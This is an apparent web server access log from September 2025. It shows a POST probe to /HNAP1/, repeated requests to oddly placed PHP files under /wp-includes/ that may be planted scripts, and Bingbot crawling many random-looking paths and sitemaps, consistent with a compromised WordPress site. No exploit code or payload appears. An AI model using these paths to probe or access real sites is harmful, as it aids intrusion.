175.107.2.77 - - [16/Sep/2025:12:05:18 -0700] "POST /HNAP1/ HTTP/1.0" 400 - "-" "-" 10235 **10/10235581**
52.167.144.159 - - [16/Sep/2025:12:06:26 -0700] "GET /wf2304176/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4873**
52.167.144.176 - - [16/Sep/2025:12:09:27 -0700] "GET /j4770680/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 8 **0/8969**
52.167.144.176 - - [16/Sep/2025:12:09:27 -0700] "GET /ks3997423/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 5 **0/5086**
208.110.64.178 - - [16/Sep/2025:12:48:03 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 517 **0/517332**
52.167.144.16 - - [16/Sep/2025:12:49:29 -0700] "GET /t3440436/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11793**
52.167.144.208 - - [16/Sep/2025:12:50:55 -0700] "GET /?home-appliances/vacuum-cleaners/1ufwv HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 6 **0/6827**
52.167.144.208 - - [16/Sep/2025:12:50:55 -0700] "GET /si4255656/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4260**
208.110.64.178 - - [16/Sep/2025:12:54:43 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 14 **0/14761**
52.167.144.208 - - [16/Sep/2025:12:55:36 -0700] "GET /u2119778/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11291**
40.77.167.16 - - [16/Sep/2025:12:57:27 -0700] "GET /si878708/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4038**
52.167.144.208 - - [16/Sep/2025:13:01:01 -0700] "GET /wp-site.php/sitemap444.xml HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 7 **0/7319**
40.77.167.16 - - [16/Sep/2025:13:01:15 -0700] "GET /wp-site.php/sitemap340.xml HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10439**
